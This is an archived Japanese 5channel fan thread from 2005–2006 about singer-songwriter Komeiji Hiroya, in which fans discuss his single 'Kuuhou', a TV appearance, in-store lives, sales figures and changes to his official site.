5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆◆古明地洋哉【コメイジヒロヤ】#4 空砲◆◆

1 :名無しさん@お腹いっぱい。:2005/05/10(火) 02:34:59 ID:iUH0XeDu
僕の歌は銃だ。今こそ僕の言葉を銃に込めて、世界に撃ち放つんだ。


歌えない歌うたい・古明地洋哉について語るスレ

前スレ
◆◆古明地洋哉【コメイジヒロヤ】#3 夜の冒険者◆◆
http://music4.2ch.net/test/read.cgi/musicj/1098186711/

関連サイト・過去ログは>>2-3

2 :名無しさん@お腹いっぱい。:2005/05/10(火) 02:35:34 ID:iUH0XeDu
◆関連リンク
KOMEIJI HIROYA official web site
ttp://www.msap.net/KOMEIJI/

Komeiji-Hiroya.net(参加型ウェブ)
ttp://www.komeiji-hiroya.net/

"wish you were here"ツアーサイト
ttp://www.komeiji-hiroya.net/tour_web/top.html

コロムビアミュージックエンタテインメント
ttp://columbia.jp/~komeiji/


◆最新情報
5月18日(水) New Single「空砲/世界の果て」リリース

5月13日(金) ポップジャム出演決定
         NHK総合 :5月13日(金) 24:15〜24:54
         BS-hi :5月24日(火) 14:15〜14:54

3 :名無しさん@お腹いっぱい。:2005/05/10(火) 02:36:03 ID:iUH0XeDu
◆過去ログ
古明地洋哉
http://piza.2ch.net/log/music/kako/960/960807774.html
★★古明地 洋哉を叩いてちょ★★
http://curry.2ch.net/musicj/kako/995/995280937.html
古明地洋哉ってどうよ?
http://music.2ch.net/musicj/kako/1013/10138/1013874830.html
★★★★★★★★★古明地 洋哉
http://music.2ch.net/musicj/kako/1006/10063/1006324416.html
◆◆◆古明地洋哉【コメイジヒロヤ】◆◆◆
http://ex5.2ch.net/test/read.cgi/musicj/1070514043/
◆◆◆古明地洋哉【コメイジヒロヤ】 2◆◆◆
http://ex5.2ch.net/test/read.cgi/musicj/1095633459/

4 :名無しさん@お腹いっぱい。:2005/05/10(火) 22:19:20 ID:CFf3u/OA
>>1 乙

5 :名無しさん@お腹いっぱい。:2005/05/11(水) 15:55:21 ID:LN45c7dp
おお、サンクスです。>>1

6 :名無しさん@お腹いっぱい。:2005/05/11(水) 20:05:33 ID:YJaw8csE
またすぐ落ちるって

7 :名無しさん@お腹いっぱい。:2005/05/12(木) 01:19:29 ID:SPD9cdII
さっきスペシャでPV見た。
直球な曲だね、今回。ロックミュージシャンっぽい。

8 :名無しさん@お腹いっぱい。:2005/05/12(木) 02:30:41 ID:SPD9cdII
でさ、誰か、北海道限定スペシャルCDか、九州限定スペシャルCD
当たったヤシいる?

はがき出したけど届かないんで外れたのかな。

9 :名無しさん@お腹いっぱい。:2005/05/12(木) 21:56:19 ID:6ls1HPvz
ポップジャム、どうなのか?
アリかナシか判断されたのが数字になって表れるというのが・・・。
今回、コメちゃんど真ん中って感じの曲ではないし。
数字低そうな・・・。

10 :名無しさん@お腹いっぱい。:2005/05/13(金) 21:50:56 ID:xZEYIFQ1
メルみてスレ探してみたがたってたか

楽しみだwwww

11 :名無しさん@お腹いっぱい。:2005/05/13(金) 23:35:50 ID:fXWQWV7q
もうすぐPJだ!あぶねー忘れてた。

>9
ね。数字低くてショックを隠せない顔が目に浮かんでしまう

12 :名無しさん@お腹いっぱい。:2005/05/14(土) 00:24:25 ID:DH5l+ttc
PJアゲ
地震のお陰で忘れてたの気づいたw

13 :名無しさん@お腹いっぱい。:2005/05/14(土) 00:50:24 ID:snkFuv7I
なんかさ古明地さんがこんなふうに大っきな会場にいるのは
歌がもったいない気がする

14 :名無しさん@お腹いっぱい。:2005/05/14(土) 00:53:24 ID:6Fy7QE8I
本人の感想聞きたいなあ、ブログやってないのかな
お客棒立ちだったw

15 :名無しさん@お腹いっぱい。:2005/05/14(土) 00:58:21 ID:lSUBF5Di
実況の評判は低かったな

16 :名無しさん@お腹いっぱい。:2005/05/14(土) 15:55:45 ID:EFmTocOI
PJ見たよ古明地さんが出るとは知らなかったけど
ブレイクレーダーのポイントはあまり気にしてなかった様子だったね
短髪のイメージがあったけど今回髪の毛伸びててビックリしたよ

17 :名無しさん@お腹いっぱい。:2005/05/15(日) 02:35:34 ID:SoiNG9Gi
PJで初めて見た。
なんか余計なこと言い過ぎ。
特に最後の空砲を3回繰り返すところいらない。

18 :名無しさん@お腹いっぱい。:2005/05/15(日) 08:49:13 ID:UlFp1kRI
空〜砲〜
空〜砲〜
空〜砲〜

19 :名無しさん@お腹いっぱい。:2005/05/15(日) 10:59:01 ID:EHCoLrMU
PJのあのコーナーってすごいシビアだな。
自分の音楽を信じていても、落ち込むだろうね

20 :名無しさん@お腹いっぱい。:2005/05/15(日) 11:29:10 ID:soBhpfWB
58はないよなあw

それでも空砲は初期のスローなのがよかった希ガス

21 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:11:23 ID:c/vSFyO9
>>17
何言ってるの。
歌詞の回りくどいところとか、しつこいところが良いんじゃない。
古くて好き。


22 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:52:31 ID:FSiwPauH
もしかしてこれからpvがwmvでフル見れるのかよ、気前いいな
保存したぜ(`・ω・´)

23 :名無しさん@お腹いっぱい。:2005/05/17(火) 20:47:48 ID:1EehxWH2
世界の果て良すぎ

24 :名無しさん@お腹いっぱい。:2005/05/18(水) 06:50:33 ID:209449s4
人稲杉

25 :名無しさん@お腹いっぱい。:2005/05/19(木) 15:41:52 ID:xSWvuSla
やぁ!

26 :名無しさん@お腹いっぱい。:2005/05/19(木) 22:32:15 ID:6HM7XAUP
なんだコッチに移動してましたか。
先週のポップジャム思いっきり浮いてたけど、
評判良かったみたいっすね。でも58はなあ。
古明地知名度UPしてくれるのは嬉しいけど、
ライブチケ入手困難なまでになるのはチト勘弁。
ま、そこまでブレイクするはずねえか(苦笑)

空砲まだ買ってないっす。


27 :名無しさん@お腹いっぱい。:2005/05/19(木) 22:40:02 ID:zspgNGd8
買ってから言え

28 :名無しさん@お腹いっぱい。:2005/05/20(金) 05:45:57 ID:J2Rx3ajA
夜の冒険者が名盤過ぎて困る

29 :名無しさん@お腹いっぱい。:2005/05/20(金) 06:21:42 ID:eiV5t7mp
町田か池袋どっちに行こう。。。

30 :名無しさん@お腹いっぱい。:2005/05/20(金) 19:46:18 ID:q8ywh+tf
買ってきましたよ。やっぱポップジャムの58ってのはなぁ。
毎回ライブで弾き語りバージョンに馴染んでたから、
先月のクアトロでバンドバージョン聴いた時は違和感あったけど、
音源になって繰り返し聴くとバンドのほうがカッコ良いか。
「世界の果て」って歌詞変わってますよね。「〜なんだってさ」が
気に入ってたので、シングルバージョンは少し微妙。名曲だけど。

>>29さん
町田と池袋ダブルヘッダーってのは?俺は池袋へ。
サイン入りCD何枚も持ってるからタワレコで買いましたけど。

31 :名無しさん@お腹いっぱい。:2005/05/22(日) 00:38:50 ID:Kt+1EBgX
誰かロフト行ったひとー?

32 :名無しさん@お腹いっぱい。:2005/05/22(日) 19:11:34 ID:FM56227u
ロフト残業でいけなかった…
今日のインストア、町田のほうは如何でした?
池袋のは4曲しかやんなかった。
まあ無料だから充分っちゃ充分なんですけどね。
昨年末の横浜HMVは、もう少し多くやってませんでした?
けっこう人が多く思えたのはポップジャム効果?

33 :名無しさん@お腹いっぱい。:2005/05/23(月) 11:54:45 ID:FCMH3LMo
そういや5月20日でCDデビュー5周年でしたな。

34 :名無しさん@お腹いっぱい。:2005/05/23(月) 16:40:00 ID:A5jx3+kQ
>>32
え?あれで人が多いほうなのか・・・orz
もうちっと人が多いかと思ってた。今度の新宿タワレコに期待。
司会の人の「めざまし&PJに好評出演」というアナウンスにワラタ。

35 :名無しさん@お腹いっぱい。:2005/05/23(月) 20:32:16 ID:kbAIulvE
いや、あんなもんだと思う<インストア
通りすがりで足を止める人多かったから、
たくさん来てたように見えたのでは。
新宿タワレコ…平日かぁ。でも行くぜよ。

36 :名無しさん@お腹いっぱい。:2005/05/24(火) 02:42:07 ID:4nIAWFLw
またオヒ荒れてるね

37 :名無しさん@お腹いっぱい。:2005/05/24(火) 22:27:21 ID:uv/Nwws0
なんなんだろね。金返せっての。

38 :名無しさん@お腹いっぱい。:2005/05/25(水) 21:34:47 ID:r1JPqOT/
古明地さんのファンって、こんな香ばしいヤシばかりなの?

39 :名無しさん@お腹いっぱい。:2005/05/25(水) 22:31:05 ID:sv0hsLd8
ああああれと一緒にしないでくれ

40 :名無しさん@お腹いっぱい。:2005/05/25(水) 22:37:31 ID:x0NLWTzy
orz..

41 :名無しさん@お腹いっぱい。:2005/05/25(水) 23:00:34 ID:r1JPqOT/
「あれ」って「恥ずかしくないんですか?」の人?
なんか俺を含めて古明地ファンって、良くも悪くも
思い入れ深い人が多いねー。
しかし俺は断然「空砲」を支持するよ!

42 :名無しさん@お腹いっぱい。:2005/05/26(木) 04:27:49 ID:9WnpQAIC
ぜひとも、リクエストor問い合わせを!ってメール来るんだな。
「思いが〜」で上手くヒットしなかったからかなり必死な気もする>事務所
100位以内に入るとかアルバムがある程度売れるとかやっぱ求められているんだね。
評価は高いけど、実売が伴わないってすごく納得いかないんだろうな。
ちなみに、今までの枚数とかわかる人いる?

43 :名無しさん@お腹いっぱい。:2005/05/26(木) 23:02:36 ID:8FFgJHdR
事務所っていうかマネなどのスタッフが熱過ぎるんだよなぁ。
こっちはそれにちょっと引くのに・・・

空砲の良し悪しってより、古明地さんの曲が変わってきた気はする。
物語的リアルみたいのを終わらせて、ロック調を目指してるのかな

44 :名無しさん@お腹いっぱい。:2005/05/27(金) 01:10:11 ID:LL2Bm+DI
ポスター、池袋でもらったけどサインが入ってないって気づかなかったorz
見てないからだけど。
対応が凄いな。なんか、気合入れすぎで見てるこっちが心配になる。
米ちゃん、スタッフにこき使われてないか心配だ。

45 :名無しさん@お腹いっぱい。:2005/05/28(土) 18:35:22 ID:7FFGfmcf
今メルマガ見たけど、流石にあれは引くね・・・
人気を装ってもしょうがない気もするんだが

46 :名無しさん@お腹いっぱい。:2005/06/02(木) 23:12:09 ID:5BvxyEkQ
あげ

47 :名無しさん@お腹いっぱい。:2005/06/04(土) 01:41:26 ID:z8zEh8Cv
タワー限定のやつ、店頭発売と同時に普通に通販やってたのにな

48 :名無しさん@お腹いっぱい。:2005/06/05(日) 07:06:23 ID:lwJXYo4v
ファウストを早く音源化して( ゚д゚)ホスィ…

49 :名無しさん@お腹いっぱい。:2005/06/07(火) 09:02:37 ID:XQzkx2r9
「手を」はいつ音源化するんだろう?
あと「Sleeping Sheep」を聞いてみたい。

50 :名無しさん@お腹いっぱい。:2005/06/07(火) 10:54:03 ID:mZSIszYh
テオは、音源化したいって言ってたな。
次のアルバムに入ればいいんだが、アルバムのカラーとちょっと違う気もする。

51 :名無しさん@お腹いっぱい。:2005/06/07(火) 19:11:17 ID:z9qpD21l
パクリ曲じゃないかあれ

52 :名無しさん@お腹いっぱい。:2005/06/09(木) 11:37:58 ID:9e3EmxmS
インストアライブage

53 :NO MUSIC NO NAME:2005/06/14(火) 14:51:38 ID:xAtkOTTs
Bring Back Music、楽しみだ。

54 :NO MUSIC NO NAME:2005/06/15(水) 07:21:48 ID:LIiSIT59
有線でかかったてたage

55 :NO MUSIC NO NAME:2005/06/20(月) 16:01:37 ID:xDXT+AXe
聞いてる内にだんだん良く思えてきた。

56 :NO MUSIC NO NAME:2005/06/20(月) 20:57:50 ID:JObYrkLY
すぐ飽きるさ

57 :NO MUSIC NO NAME:2005/06/22(水) 06:19:02 ID:9M45Emba
飽きない

58 :NO MUSIC NO NAME:2005/06/23(木) 15:43:27 ID:Hij4kxXq
PJで観てファンになった俺が来ましたよ

東北限定シングルとやらを買ったが、コレマジで東北限定?

59 :NO MUSIC NO NAME:2005/06/28(火) 08:06:17 ID:vsjf/CsI
おっ、新規ファンか。純粋に嬉しいな。
限定シングルは、ライブ会場でも買えたけど基本的には限定。
地域別に作って、話題にさせてからめざましTVとブレイクを狙ったわけだが。。。
結果はこの進行状況のとおり。

あと、今頃発見したが、これに申し込む人いるのかなぁ?
ttp://extra.barks.co.jp/channel/loft/topics_samples1.html#komeiji

60 :NO MUSIC NO NAME:2005/06/28(火) 23:30:38 ID:yYEXnS4/
首の動きが気になった。Bring Back! Music見てて。

61 :NO MUSIC NO NAME:2005/06/29(水) 01:31:17 ID:yNNrnifC
26日ピールアウト@大阪にオザワ&こめちゃんいたよ。
最初似てる人いるなーってしか思えなくて、何気に見てみてびっくり。
最近サイトも見てなかったんで、すげー??だったがインストア中だったんね。
早くツアーやってくんないかな。

62 :NO MUSIC NO NAME:2005/07/02(土) 13:26:22 ID:ShYyMXYC
今日は札幌だね。

63 :NO MUSIC NO NAME:2005/07/03(日) 00:58:48 ID:mPZYJuiB
札幌行った人いないの?けっこう人いたけど、すげえ押しててイラッと来てしまった。

64 :NO MUSIC NO NAME:2005/07/03(日) 15:17:49 ID:lrm/V6s/
このスレに何人いると思ってるのよw

65 :NO MUSIC NO NAME:2005/07/04(月) 07:04:23 ID:60GCY5ta
公式BBSで「ベスト盤出せ!」つってる連中…
ま〜た少し前にさわいでた、「想いが言葉に変わるとき」の
シングルVer.をアルバム収録しろ」って奴らと同じ組織票だろ。
(ひとりが名前変えて書き込んでも組織票か?)
しかし香ばしい古明地ファン増えたね最近。
sleepy ab.ってそんなヘタなの?CDでしか聴いたことないけど。
CDはけっこう好きだけどな。


66 :NO MUSIC NO NAME:2005/07/05(火) 06:24:29 ID:Ienun/VF
公式BBSは見てないからアレだが、うざったい連中だな。
香ばしいのが増えても、一般層に浸透していかないのが痛いね。
今回の「空砲」もオリコン200位以内にランクインしてないし。
↑調べたときに、アルバムが一枚もランクインしてないことにショックを受けた。

67 :NO MUSIC NO NAME:2005/07/05(火) 22:41:16 ID:N3oV9bh6
微妙にメディア露出したおかげで、新規ファンがついたのは嬉しいけど、
道理とか礼儀とかも知らない、香ばしい連中が現われるのは仕方ないのか。

ま、こっちはこっちで大人チックにマターリと行きまっしょい!

68 :NO MUSIC NO NAME:2005/07/06(水) 23:48:14 ID:OeUHRFG3
>63
「すげえ押してて」を読んで、
@時間が押して  A後ろからぎゅうぎゅうに押されてて
と二択あったんだけど、速攻Aは脳内削除されたよ。
66さんを読んで。

69 :NO MUSIC NO NAME:2005/07/07(木) 00:34:43 ID:CrMwj/ii
>速攻、脳内削除
悲しい・・・。
しかし、もう少し売り上げがあってもいいと思うんだが。

70 :NO MUSIC NO NAME:2005/07/08(金) 14:44:30 ID:lzQBabX+
そもそも既にピークは過ぎてしまった感がある気がするんだけどそれは気のせいか?

古明地さんの、ロックを鳴り響かせろとかそういうのがちとよくわからん。
俺が古明地さんに対して
絵本をぺらりとゆっくりめくるその瞬間をスローモーションにしたような音楽のイメージ(わかりずれぇな)
を勝手に持っちゃってるからなんだけど。

71 :NO MUSIC NO NAME:2005/07/08(金) 19:22:27 ID:FN0/O4xk
他のファンの人はどうなのか判らないけど、自分のピークはmind gameだなぁ。
孤独の音楽はいまいち盛り上らなかったよ自分の中で。
※氏のリリカルさが弱まってる気がする。
ロックていうカテゴリーによって

72 :NO MUSIC NO NAME:2005/07/08(金) 19:28:34 ID:Uk/eT8ur
夜の冒険者が良すぎたから
漏れはこれからの作品に期待大なんだが

73 :NO MUSIC NO NAME:2005/07/08(金) 23:06:15 ID:YK89LAmT
私もmind gameが頂点かも。
それ以前が盛り上って、それ以降がゆっくりと下降していってるような

74 :NO MUSIC NO NAME:2005/07/11(月) 06:45:18 ID:pFU9D5Th
(屮゚Д゚)屮

75 :NO MUSIC NO NAME:2005/07/11(月) 21:56:56 ID:H9o1n7qa
夜の冒険者
空砲/世界の果て
孤独の音楽
讃美歌 I

讃美歌聞きすぎで鬱だ…次はマインドゲームでも買おうかな

76 :NO MUSIC NO NAME:2005/07/14(木) 00:47:52 ID:ddf60TWx
あたしは孤独の音楽が良かったから、それ以降迷ってる感じが
してたけど、空砲でやっと突き抜けた!って思ったから、割と好き。
ここからどうなるかすごく期待してる。
でも最近mind game聴くのが多いけどW

77 :NO MUSIC NO NAME:2005/07/14(木) 01:43:09 ID:pSr7GhyH
mind gameほんといいよな。
1枚でショートフィルム見ているようだ。
しかも曲と古明地さんの声調がしっくりきてると思うし。

78 :NO MUSIC NO NAME:2005/07/14(木) 17:30:44 ID:qSdOFu+I
mind gameは俺も好きだ。
8月のライブ、どうしようかな・・・。

79 :NO MUSIC NO NAME:2005/07/14(木) 21:22:27 ID:3X53k7Ms
>>76

80 :NO MUSIC NO NAME:2005/07/18(月) 00:34:56 ID:EwrUS6vY
8月のは対バンばっかだね。見たことない人だらけなんだが
おすすめの人いる?

81 :NO MUSIC NO NAME:2005/07/20(水) 00:32:31 ID:FT5RYahu
age


82 :NO MUSIC NO NAME:2005/07/21(木) 13:09:54 ID:Q/hqtjfy
やっぱWINO絡みの日じゃね?
number(n)ine懐かしいな。
「春の嵐」やってくれないかな。

83 :NO MUSIC NO NAME:2005/07/22(金) 17:16:10 ID:7Q3Vd86G
◆吉村潤&古明地洋哉“HALLELUJAH !”
 【公演日】2005/8/12(fri)
 【場所】下北沢440
 【時間】open 18:30 / start 19:30
 【チケット】adv \2,300 / at door \2,800(共にドリンク代別)
     発売中:440店頭(03-3496-1561)
         チケットぴあ[P-code 207-025]7/18発売
 【出演】吉村潤/古明地洋哉
 【問い合わせ】下北沢440 03-3422-9440

これ?

84 :NO MUSIC NO NAME:2005/07/23(土) 04:11:44 ID:tb2scUDS
>>80
DUSKも良いよ
弥吉さんと岩井さんと繋がりの有る戸谷誠って人がギターやってる

85 :NO MUSIC NO NAME:2005/07/26(火) 04:32:46 ID:rT2+Sx1S
新作は年内かぁ・・・。

86 :NO MUSIC NO NAME:2005/07/29(金) 13:41:24 ID:VCLWGVrJ
マネが変わるのそんなに大げさなことか?

87 :NO MUSIC NO NAME:2005/07/30(土) 23:31:24 ID:ZHitZLLv
ファンには関係ないけどコメには大きいだろうな。
7年て長いな。

88 :NO MUSIC NO NAME:2005/07/30(土) 23:38:58 ID:ZHitZLLv
それよりコレ。HEAT WAVEの人の日記で見つけた。
もう、なんかワロス。
ttp://www.rkb.ne.jp/ajiwai/

89 :NO MUSIC NO NAME:2005/07/31(日) 14:24:44 ID:ZtlUaPQ2


90 :NO MUSIC NO NAME:2005/08/01(月) 23:26:08 ID:zNw96hiz
>88
日記に書いてあるね。
テーマ曲だから???
見れないorz

91 :NO MUSIC NO NAME:2005/08/05(金) 03:13:30 ID:KJ3k67JX
意味なしage

92 :NO MUSIC NO NAME:2005/08/05(金) 23:56:37 ID:7k4POxcO
何このグルメ旅番組。

93 :NO MUSIC NO NAME:2005/08/06(土) 07:45:14 ID:E8XSR5PU
保守

94 :NO MUSIC NO NAME:2005/08/07(日) 23:14:21 ID:Tkd5qB0w
最近興味持ったものですけど、見つけるのが困難になりつつある作品ってありますでしょうか?
どれから買っていこうかと考え中でして。

95 :NO MUSIC NO NAME:2005/08/08(月) 01:50:47 ID:0L8YOXAS
うーん、でも今は結構再発されちゃったんだよね。
敢えて言うなら、ライブ会場限定で発売されたCDか?
いつだったか、タワレコで限定発売もしてたけど(俺が知ってるのは新宿店)。
オフィで確認してくれ。

96 :94:2005/08/08(月) 11:34:54 ID:MEyh+vEf
親切にありがとうございます。
出してるCD、結構な数のようですが、地道に揃えていこうと思います。

97 :NO MUSIC NO NAME:2005/08/11(木) 12:57:54 ID:CGm2MQbL
そろそろ(屮゚Д゚)屮

98 :NO MUSIC NO NAME:2005/08/14(日) 05:53:09 ID:CX7OfiIQ
ライラックは再発された?

99 :NO MUSIC NO NAME:2005/08/14(日) 21:04:53 ID:hOLcaooJ
Sg「ghost/ライラックの庭」だけは再発されてないから入手難しいよ。

100 :NO MUSIC NO NAME:2005/08/14(日) 22:32:44 ID:D26E2XIc
誰もライブに行かなかった?

101 :NO MUSIC NO NAME:2005/08/16(火) 12:46:44 ID:gD7HelgZ
>>100
『天使たちのシーン』良かった。ハレルヤも

102 :NO MUSIC NO NAME:2005/08/21(日) 12:49:06 ID:BEBK5vQh
ほしゅ

103 :NO MUSIC NO NAME:2005/08/22(月) 19:24:23 ID:5xLPWryi
いくつなんですか?
ケコーンは?

104 :NO MUSIC NO NAME:2005/08/22(月) 22:41:56 ID:to9xrJio
ライブ良い!!!!!!!!!!

105 :NO MUSIC NO NAME:2005/08/28(日) 12:43:22 ID:0ZJdA4M0
なぜ弥吉さんはライブに来ないのだろうか?

106 :NO MUSIC NO NAME:2005/08/28(日) 19:46:47 ID:AKFDJAAG
>>105
この夏はaikoとか吉川晃司とかのサポートで忙しかったんじゃ?

107 :NO MUSIC NO NAME:2005/08/29(月) 13:16:12 ID:QPluywoW
>>106
さすが。でもやっぱりバンド編成のライブには彼がいた方が良い。

108 :NO MUSIC NO NAME:2005/09/03(土) 02:28:08 ID:Pv8FbygQ
マネの日記なんかいらね

109 :NO MUSIC NO NAME:2005/09/03(土) 17:34:17 ID:ylM2mmqf
バイオリンの岡村○央さんて、古明地さんの彼女ですか?

110 :NO MUSIC NO NAME:2005/09/09(金) 14:36:42 ID:w9KyI6IL
違うでしょう

111 :NO MUSIC NO NAME:2005/09/15(木) 14:58:56 ID:WAMKs890
年内にアルバム出るんかしら?

112 :富田派:2005/09/15(木) 23:41:08 ID:kbBEkpzF
みおちゃん、って呼ぶのがすごい嫌い。なんかなれなれしい。

綺麗な人なだけに余計・・・

113 :NO MUSIC NO NAME:2005/09/16(金) 01:44:36 ID:nBOnHRwI
あんたに言われる筋合いないでしょうw>112

114 :NO MUSIC NO NAME:2005/09/17(土) 02:04:48 ID:Jv5kCdiy
>>112
あの人どこの現場でもミオちゃんって呼ばれてるよ
岡村さんなんて読んだらそっちの方があやしいよ

115 :NO MUSIC NO NAME:2005/09/19(月) 13:13:05 ID:aiRwYhiS
もっともっと削ぎ落とすのさ

116 :NO MUSIC NO NAME:2005/09/19(月) 22:55:21 ID:ceUuTJOc
>>109さん

8月のClib QueでのMCで、「美央ちゃんの恋愛運は試練の時」とか言った後に、
すげえハードなアレンジで“世界の果て”やってカッコ良かったのですが、
演奏後に「これから試練の時を迎える二人だけど頑張る」とかコメ言ったから
付き合ってんのかな(あるいは、付き合い始めたのかな〜)と思いましたけど。
その辺りのコメ日記でも微妙にルンルン気分だったから。
コメさん好きなんだけど、時々MCなんかで引く発言しますね。


117 :NO MUSIC NO NAME:2005/09/26(月) 01:14:16 ID:6syLsKzC
hosyu

118 :NO MUSIC NO NAME:2005/09/29(木) 21:10:39 ID:pIAmA+rI
久しぶりに来た

119 :NO MUSIC NO NAME:2005/10/01(土) 13:27:58 ID:ltHAvy4i
>>118
私も5日ぶり

120 :NO MUSIC NO NAME:2005/10/01(土) 23:51:08 ID:Qyq+8wYf
月曜のライブに行く人いる?5月以来なんで楽しみ。


121 :NO MUSIC NO NAME:2005/10/06(木) 15:00:28 ID:k9Zy1bPK
音沙汰なし

122 :NO MUSIC NO NAME:2005/10/07(金) 13:17:59 ID:DBf7IFyk
インストライブって?

123 :NO MUSIC NO NAME:2005/10/07(金) 20:35:41 ID:dowIq6/o
>>120さん
月曜のライブいきました?どんなですた?
仕事で行けなかったのでレポしていただければ。


124 :NO MUSIC NO NAME:2005/10/07(金) 22:20:49 ID:hN7ghTqw


125 :NO MUSIC NO NAME:2005/10/13(木) 15:38:50 ID:6prIufIw
今何してんだろう

126 :NO MUSIC NO NAME:2005/10/20(木) 01:22:30 ID:qOjJLs9V
ないしょ

127 :NO MUSIC NO NAME:2005/10/25(火) 15:06:46 ID:eWadCQ7k
PV見れなくなっちゃった。

128 :NO MUSIC NO NAME:2005/10/25(火) 23:27:53 ID:+p4LmqT8
え、マジ?
早めに保存しておいて良かった・・・。

129 :富田派:2005/10/29(土) 21:57:00 ID:iqGKyZs1
>>114
そうなのかなあ・・・

シロップにゲストできてたときは普通に「岡村さん」だったな・・・。
やっぱこうセンスの問題な気がするけどなあ・・・

130 :NO MUSIC NO NAME:2005/11/03(木) 02:10:52 ID:BEez1/r9
>>129
センスって…orz
知り合い?

131 :NO MUSIC NO NAME:2005/11/05(土) 16:15:00 ID:GF2x0WJ9
...

132 :NO MUSIC NO NAME:2005/11/10(木) 20:29:53 ID:+aDf1Y48
ho

133 :NO MUSIC NO NAME:2005/11/10(木) 21:45:24 ID:V7wnopCM
アルバム年内は無理っぽいなぁ。
今年は何枚かシングル出すって言ってたのになぁ。

134 :NO MUSIC NO NAME:2005/11/11(金) 00:51:41 ID:yunsVR1a
久々にサイト行ってみたら、工事中なんだね。いつから?
でも、掲示板はあのままいってたら閉鎖になるんじゃないかとは
思ってたけど。仕方ない気もするけど、何か残念。

135 :NO MUSIC NO NAME:2005/11/17(木) 21:51:25 ID:8veDXx5V
10月から

136 :NO MUSIC NO NAME:2005/11/18(金) 00:04:36 ID:yq9Mvie4
>134
あのままいってたら閉鎖になる

って、何で?荒れた?

137 :134:2005/11/19(土) 00:14:31 ID:JRl/WAq7
空砲出た辺りから特に変な書き込み増えてたし。
それ以外でも何か空気悪くなってるなーとは思ってたから。
最終的にどんな感じで閉めたのか気になってる。


138 :NO MUSIC NO NAME:2005/11/20(日) 02:27:46 ID:sm1RfalB
地元で歌ってたのを聴いて一発でハマりました。声がすきです。

139 :NO MUSIC NO NAME:2005/11/21(月) 15:53:30 ID:CKp0/pgp
11/23ミュージックスクエアで新曲O.A.age

140 :NO MUSIC NO NAME:2005/11/21(月) 22:26:53 ID:e6h4xhwa
シングル「欲望」って、持ってる人います?
なんか歌詞カードにくるまれた1曲入りのやつ。

141 :NO MUSIC NO NAME:2005/11/23(水) 17:30:05 ID:N7M8Yerj
>>134
確かに北海道北海道とか言ってる厨房いたね。
スタッフもその頃からレスのしようが無いって感じで放置してたのかな。

>>140
オクに出てんじゃない?

142 :NO MUSIC NO NAME:2005/11/23(水) 22:00:06 ID:Kab7Tlm4
結構良い曲じゃね?
なんかどっかで聴いたような感じだったが

143 :NO MUSIC NO NAME:2005/11/24(木) 15:03:35 ID:Wf1EzlsH
普通に古明地らしい曲だったね。「何もない」

シングルとして出すには弱いかな。

144 :NO MUSIC NO NAME:2005/11/24(木) 20:10:14 ID:vRwTIHNF
うお!ゆんべタイマー録音失敗してた…
休日出勤のバカヤロー!
「何もない」って言うんですか?新曲。
どんな感じなんでしょうか…

145 :NO MUSIC NO NAME:2005/11/25(金) 20:43:39 ID:LANXdI73
空砲を超えた激しい曲だよ

146 :NO MUSIC NO NAME:2005/11/27(日) 00:22:23 ID:RLjilg5z
>>145
違うじゃん 何か寂しい曲だなぁ

147 :富田派:2005/12/02(金) 13:06:07 ID:Ef632o3U
ダンスチューンだったじゃないか

148 :NO MUSIC NO NAME:2005/12/02(金) 19:18:47 ID:B0UHh3Z5
つまらん

149 :NO MUSIC NO NAME:2005/12/03(土) 00:50:06 ID:CVUVBM4B
>>148
naniga?

150 :NO MUSIC NO NAME:2005/12/06(火) 09:32:18 ID:2aNPGk0H
 

151 :NO MUSIC NO NAME:2005/12/06(火) 11:43:57 ID:eWUDs/zU
ハイテンション古明地

152 :NO MUSIC NO NAME:2005/12/08(木) 02:33:23 ID:i7j1KI6N
>>151
naniga?www

153 :NO MUSIC NO NAME:2005/12/15(木) 21:33:24 ID:bWsVrriG
もっとライブやってくれ

154 :NO MUSIC NO NAME:2005/12/16(金) 22:41:00 ID:GJ8VTpJH
もっと激しい曲作ればいいのに

155 :NO MUSIC NO NAME:2005/12/21(水) 20:15:01 ID:rWCalFpO
落ちそうだからあげとく

156 :NO MUSIC NO NAME:2005/12/28(水) 04:02:21 ID:UN3r5Ukm
全然サイト工事が終わらんね。いつ再開&ライブするのやら。


157 :NO MUSIC NO NAME:2006/01/04(水) 18:43:55 ID:HIh+QPyF
山梨に帰ったんじゃねえの?

158 :NO MUSIC NO NAME:2006/01/04(水) 21:33:01 ID:EEhaEaAD
山梨にある名字だけど山梨出身じゃないよ

159 :NO MUSIC NO NAME:2006/01/07(土) 21:50:16 ID:fvCsiCDo
やっと動き出すんかな

160 :NO MUSIC NO NAME:2006/01/10(火) 04:09:49 ID:O7IltU3F
>>159         なぜそう思う?

161 :NO MUSIC NO NAME:2006/01/16(月) 22:54:39 ID:hbfrVi4Z
青マネやめてからオヒがそうとうつまんね。
今頃なにやってんだろ>青マネ

162 :NO MUSIC NO NAME:2006/01/19(木) 21:35:04 ID:mXXhn6/4
ホシュ

163 :NO MUSIC NO NAME:2006/01/23(月) 16:35:10 ID:NLdaUxEg
アルバム出せないのかなぁ。なんかもうアルバムは完成している気がするんですが

164 :NO MUSIC NO NAME:2006/01/28(土) 08:11:26 ID:fHq6e1vy
ありえんぐらい売れていないからね

165 :NO MUSIC NO NAME:2006/01/29(日) 16:13:49 ID:GxQF/kiC
数字的にはどれくらい売れてるの?最高で

166 :NO MUSIC NO NAME:2006/01/30(月) 02:04:15 ID:e8OxDCvM
3〜4マンくらい

167 :NO MUSIC NO NAME:2006/02/02(木) 00:14:17 ID:ONjHh4In
こめいじ、おたおめ〜

168 :NO MUSIC NO NAME:2006/02/02(木) 16:47:42 ID:WNlsS2F2
おめいじ

169 :NO MUSIC NO NAME:2006/02/02(木) 18:48:23 ID:89imhHT8
旧サイト潰す意味あったのかな?
いいかげんにしる

170 :NO MUSIC NO NAME:2006/02/02(木) 22:05:51 ID:ONjHh4In
おとなのじじょー

171 :NO MUSIC NO NAME:2006/02/07(火) 04:56:42 ID:CAb4iKI5
たしかに


172 :NO MUSIC NO NAME:2006/02/07(火) 16:52:12 ID:06PvaM16
HPリニューアルキタ━( ´∀`)・ω・) ゚Д゚)・∀・) ̄ー ̄)´_ゝ`)`Д´)-_-)冫、 )ノД`)#・ж・)=゚ω゚)´ ー

173 :NO MUSIC NO NAME:2006/02/07(火) 18:55:20 ID:1gtiP5ov
開いた途端爆笑した

